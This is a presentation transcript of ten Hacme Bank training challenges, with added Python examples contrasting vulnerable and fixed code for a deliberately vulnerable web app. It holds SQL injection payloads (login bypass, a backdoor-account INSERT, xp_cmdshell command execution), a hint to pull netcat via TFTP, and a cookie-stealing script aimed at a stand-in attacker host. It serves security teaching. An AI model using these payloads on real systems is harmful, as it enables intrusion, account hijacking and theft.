
Hacme Bank


diza




Presentation Transcript


  1. Hacme Bank

  2. Hacme Bank Challenges
  • There are 10 challenges, all of which have to be completed
  • Complete the challenges one at a time
  • We will talk about the solutions after each challenge has been completed
  • Visit the following link: xxxxxxxxx

  3. Hacme Bank Challenges - 1
  • Type: SQL Injection
  • Result: Bypass the login

  4. Hacme Bank Challenges - 2
  • Type: SQL Injection
  • Result: Database table modification
  • Steps
    • ' having 1=1--
      (SQL Server rejects a HAVING clause without GROUP BY, and its error message names the first column of the select list; repeating the trick with the columns found so far in a GROUP BY enumerates the rest)
    • ' union select (tables) from fsb_users having 1=1--
    • '; INSERT INTO FSB_USERS VALUES(123423, 'HAX0R12', 'HACKME12', 'EASY32', GETDATE())--
      (the semicolon ends the application's SELECT; SQL Server runs the appended INSERT as a second statement in the same batch)

  5. Hacme Bank Challenges - 3
  • Type: SQL Injection & Poor configuration management
  • Result: Command execution
  • Steps
    • ';EXEC master.dbo.xp_cmdshell 'command';--
    • This only works because the application connects with a database login that is allowed to run xp_cmdshell; the command runs with the privileges of the SQL Server service account. That is the configuration-management part of the challenge.
  • This can REALLY help an attacker. Here is some help:
    • The web server is also a TFTP server, and netcat is available for download and may be used for this exercise
    • The path to the file is c:\tftp32d\nc.exe
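Challenges 1 and 2 both rely on the login query being assembled by string concatenation. The script below is an added example (not Hacme Bank code and not part of the presentation) that reproduces the login bypass and the stacked INSERT against an in-memory SQLite table. Everything about the table is assumed: the column layout of fsb_users, the sample users and their plaintext passwords. SQLite's executescript stands in for SQL Server's acceptance of semicolon-separated statements in one batch, and GETDATE() is replaced by SQLite's datetime('now'). The ' having 1=1-- column-enumeration step and the xp_cmdshell step of challenge 3 depend on SQL Server specifics (its error text and the extended stored procedure) and are not reproduced.

```python
"""SQL injection login bypass and stacked INSERT against a SQLite stand-in
for Hacme Bank's FSB_USERS table (added example; table layout is assumed)."""
import sqlite3

# Challenge 1: close the string, make the WHERE always true, comment out the rest.
BYPASS_PAYLOAD = "' OR 1=1--"

# Challenge 2: terminate the SELECT and append our own statement.  The slide's
# payload uses GETDATE(); SQLite's equivalent is datetime('now').
INSERT_PAYLOAD = ("'; INSERT INTO fsb_users VALUES(123423, 'HAX0R12', "
                  "'HACKME12', 'EASY32', datetime('now'))--")


def make_db() -> sqlite3.Connection:
    """Constructed sample table: column names and rows are assumptions."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE fsb_users (user_id INTEGER, login_id TEXT, "
        "password TEXT, user_name TEXT, creation_date TEXT)"
    )
    con.executemany(
        "INSERT INTO fsb_users VALUES (?, ?, ?, ?, ?)",
        [(1, "jv", "jv789", "James", "2006-01-01"),
         (2, "jm", "jm789", "Jane", "2006-01-01")],
    )
    con.commit()
    return con


def build_login_sql(login_id: str, password: str) -> str:
    """The vulnerable pattern: user input pasted straight into the SQL text."""
    return (f"SELECT login_id FROM fsb_users WHERE login_id = '{login_id}' "
            f"AND password = '{password}'")


def login_vulnerable(con, login_id, password):
    """Single-statement execution of the concatenated query.
    Returns the matched login_id or None."""
    row = con.execute(build_login_sql(login_id, password)).fetchone()
    return row[0] if row else None


def login_vulnerable_stacked(con, login_id, password):
    """Same concatenation, run through an API that accepts several
    ';'-separated statements, as SQL Server does.  The SELECT result is
    discarded; the attacker only cares about the second statement."""
    con.executescript(build_login_sql(login_id, password))


def login_safe(con, login_id, password):
    """Parameterised query: the input is bound as data, never parsed as SQL."""
    row = con.execute(
        "SELECT login_id FROM fsb_users WHERE login_id = ? AND password = ?",
        (login_id, password),
    ).fetchone()
    return row[0] if row else None


def user_count(con) -> int:
    return con.execute("SELECT COUNT(*) FROM fsb_users").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print("bypass   ->", login_vulnerable(db, BYPASS_PAYLOAD, "x"))  # an existing user
    print("safe     ->", login_safe(db, BYPASS_PAYLOAD, "x"))        # None
    login_vulnerable_stacked(db, INSERT_PAYLOAD, "x")
    print("users    ->", user_count(db))                              # 3
    print("backdoor ->", login_safe(db, "HAX0R12", "HACKME12"))       # HAX0R12
```

Note that the parameterised login_safe still accepts the injected HAX0R12 account once the row exists: parameter binding stops the injection, it does not undo a compromise that already happened. For the command-execution step, the fix is on the database side as well: connect with a least-privilege login and keep xp_cmdshell disabled.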

  6. Hacme Bank Challenges - 4
  • Type: Parameter Tampering
  • Result: Privilege escalation
  • Steps
    • My accounts
    • Alter the account type from silver to platinum

  7. Hacme Bank Challenges - 5
  • Type: Parameter Tampering
  • Result: Unauthorised access
  • Tools required:
    • Firefox with the "Tamper Data" plugin, or
    • IE with Burp Proxy
  • Steps
    • Request a loan
    • Try to alter the interest rate to a better value

  8. Hacme Bank Challenges - 6
  • Type: Cross Site Scripting
  • Result: Account hijacking
  • Steps:
    • Post Message
    • Create a message and try to execute some scripts. You can use the _session.asp
    • Post your message
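The account hijack in challenge 6 works because the posted message is written back into the page unencoded, so a message containing a script runs in every reader's browser and can read their session cookie. The script below is an added example, not Hacme Bank code: the page markup, the cookie name ASP.NET_SessionId and the attacker host are assumptions. It renders a constructed cookie-stealing message both raw and HTML-encoded, and uses a real HTML parser rather than a substring match to decide whether the result still contains active script.

```python
"""Stored XSS in a message body: raw vs output-encoded rendering, checked
with an HTML parser.  Added example; page markup and cookie name are assumed."""
import html
from html.parser import HTMLParser

# Assumed page shell around a posted message; the real markup is not on the slides.
PAGE_TEMPLATE = '<html><body><h2>Messages</h2><div class="msg">{body}</div></body></html>'

# Constructed payload: sends the reader's cookie to an attacker-controlled host.
COOKIE_THEFT_PAYLOAD = ("Hi all! <script>new Image().src="
                        "'http://attacker.invalid/c?'+document.cookie</script>")


def render_message_vulnerable(body: str) -> str:
    """Inserts the stored message into the page as-is: the browser runs any
    script it contains."""
    return PAGE_TEMPLATE.replace("{body}", body)


def render_message_safe(body: str) -> str:
    """HTML-encodes the message so <, >, &, and quotes become text, not markup."""
    return PAGE_TEMPLATE.replace("{body}", html.escape(body, quote=True))


class _ActiveContentFinder(HTMLParser):
    """Records elements that would execute script: <script> tags and any
    element carrying an on* event-handler attribute."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.hits.append(tag)


def active_script_count(page: str) -> int:
    """Number of script-executing elements the browser would see in `page`."""
    finder = _ActiveContentFinder()
    finder.feed(page)
    finder.close()
    return len(finder.hits)


def session_cookie_header(session_id: str, http_only: bool = True) -> str:
    """Set-Cookie line for the session.  HttpOnly stops document.cookie from
    reading it, which limits (but does not remove) the impact of an XSS."""
    attrs = [f"ASP.NET_SessionId={session_id}", "Path=/"]   # cookie name assumed
    if http_only:
        attrs.append("HttpOnly")
    return "Set-Cookie: " + "; ".join(attrs)


if __name__ == "__main__":
    print("raw     :", active_script_count(render_message_vulnerable(COOKIE_THEFT_PAYLOAD)))
    print("encoded :", active_script_count(render_message_safe(COOKIE_THEFT_PAYLOAD)))
    print(session_cookie_header("0123456789abcdef"))
```

The encoded rendering keeps the message text visible to readers; only its meaning as markup is removed. HttpOnly is a second layer, not a substitute: a script that still runs can act on the victim's behalf (post a transfer, change the account type) without ever reading the cookie.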

  9. Hacme Bank Challenges - 7
  • Type: Parameter Tampering
  • Result: Money!!
  • Steps:
    • Transfer funds
    • Transfer money to your account from someone else's account

  10. Hacme Bank Challenges - 8
  • Type: Parameter Tampering (cookie poisoning)
  • Result: Brute force attacks are enabled
  • Tools required:
    • Firefox with the "Tamper Data" plugin, or
    • IE with Burp Proxy
  • Steps:
    • Log out and find the log
    • Figure out how this web application stops brute force attacks, and remove it

  11. Hacme Bank Challenges - 9
  • Type: Parameter Tampering (cookie poisoning)
  • Result: Brute force attacks are enabled
  • Tools required:
    • Firefox with the "Tamper Data" plugin, or
    • IE with Burp Proxy
  • Steps:
    • Log out and find the log
    • Figure out how this web application stops brute force attacks, and remove it

  12. Hacme Bank Challenges - 10
  • Type: Parameter Tampering (cookie poisoning)
  • Result: Unauthorised access to other users' accounts
  • Tools required:
    • Firefox with the "Tamper Data" plugin, or
    • IE with Burp Proxy
  • Steps:
    • Login
    • Alter the unique information that is associated with account numbers to view other accounts
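Challenges 4, 5, 7, 8/9 and 10 are one class of bug: the server reads an account number, an account type, an interest rate or a failed-login counter from the request (form field or cookie) and trusts it. The simulation below is an added example, not Hacme Bank code. The account numbers, balances, owners, rates, the cookie name and the lockout threshold are all assumptions chosen to make the failures visible. Each vulnerable handler takes its decision from the request; each safe handler takes it from server-side state keyed by the authenticated session.

```python
"""Parameter tampering and cookie poisoning, simulated in plain Python.
Added example: data, rates, cookie name and lockout threshold are assumed."""

MAX_FAILED_LOGINS = 3                                         # assumed threshold
LOAN_RATES = {"silver": 0.12, "gold": 0.09, "platinum": 0.06}  # assumed server table


class Bank:
    def __init__(self):
        # Constructed sample data: two users, three accounts.
        self.owners = {"1001": "jv", "1002": "jv", "2001": "jm"}
        self.balances = {"1001": 500.0, "1002": 100.0, "2001": 5000.0}
        self.account_type = {"jv": "silver", "jm": "gold"}
        self.passwords = {"jv": "jv789", "jm": "jm789"}
        self.failed_logins = {}                # server-side attempt counter

    # -- challenges 7 and 10: account numbers arrive in the request ---------
    def _move(self, src, dst, amount):
        if amount <= 0:
            raise ValueError("amount must be positive")
        if self.balances[src] < amount:
            raise ValueError("insufficient funds")
        self.balances[src] -= amount
        self.balances[dst] += amount

    def transfer_vulnerable(self, form):
        """Moves money between whatever accounts the form names; never asks
        whether the logged-in user owns the source account."""
        self._move(form["from"], form["to"], float(form["amount"]))

    def transfer_safe(self, session_user, form):
        """Ownership is checked against the server-side session, not the form."""
        src = form["from"]
        if self.owners.get(src) != session_user:
            raise PermissionError(f"{session_user} does not own account {src}")
        self._move(src, form["to"], float(form["amount"]))

    def view_account_safe(self, session_user, account_no):
        """Same check for read access: the identifier alone proves nothing."""
        if self.owners.get(account_no) != session_user:
            raise PermissionError(f"{session_user} may not view {account_no}")
        return self.balances[account_no]

    # -- challenges 4 and 5: privileged attributes must be server-decided ----
    def loan_rate_vulnerable(self, form):
        return float(form["rate"])             # the client chose its own rate

    def loan_rate_safe(self, session_user):
        # account type and rate are looked up; neither is read from the form
        return LOAN_RATES[self.account_type[session_user]]

    # -- challenge 8: where the failed-login counter lives -------------------
    def login_cookie_counter(self, user, password, cookies):
        """Vulnerable: the counter is a cookie the client can reset or drop.
        Returns (status, cookies the server would set)."""
        attempts = int(cookies.get("failed", "0"))
        if attempts >= MAX_FAILED_LOGINS:
            return "locked", cookies
        if self.passwords.get(user) == password:
            return "ok", {**cookies, "failed": "0"}
        return "denied", {**cookies, "failed": str(attempts + 1)}

    def login_server_counter(self, user, password):
        """Counter kept per user on the server; the client cannot touch it."""
        attempts = self.failed_logins.get(user, 0)
        if attempts >= MAX_FAILED_LOGINS:
            return "locked"
        if self.passwords.get(user) == password:
            self.failed_logins[user] = 0
            return "ok"
        self.failed_logins[user] = attempts + 1
        return "denied"


def brute_force(bank, user, guesses, strip_cookie=True):
    """Attacker loop against the cookie-based gate.  With strip_cookie the
    'failed' cookie is discarded after every attempt, so the counter never
    grows.  Returns how many guesses the server actually evaluated."""
    cookies, evaluated = {}, 0
    for guess in guesses:
        status, cookies = bank.login_cookie_counter(user, guess, cookies)
        if status == "locked":
            break
        evaluated += 1
        if status == "ok":
            break
        if strip_cookie:
            cookies = {}
    return evaluated


if __name__ == "__main__":
    bank = Bank()
    guesses = ["a", "b", "c", "d", "e", "jv789"]
    print("cookie stripped, guesses evaluated:", brute_force(bank, "jv", guesses))
    print("cookie honoured, guesses evaluated:", brute_force(bank, "jv", guesses, False))
```

The brute_force helper makes the challenge 8 point concrete: an honest client is locked out after MAX_FAILED_LOGINS, while a client that drops the cookie between attempts can try every guess. The same rule covers all five challenges: anything the server uses to authorise or price an action has to come from state the client cannot write.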

  13. ?
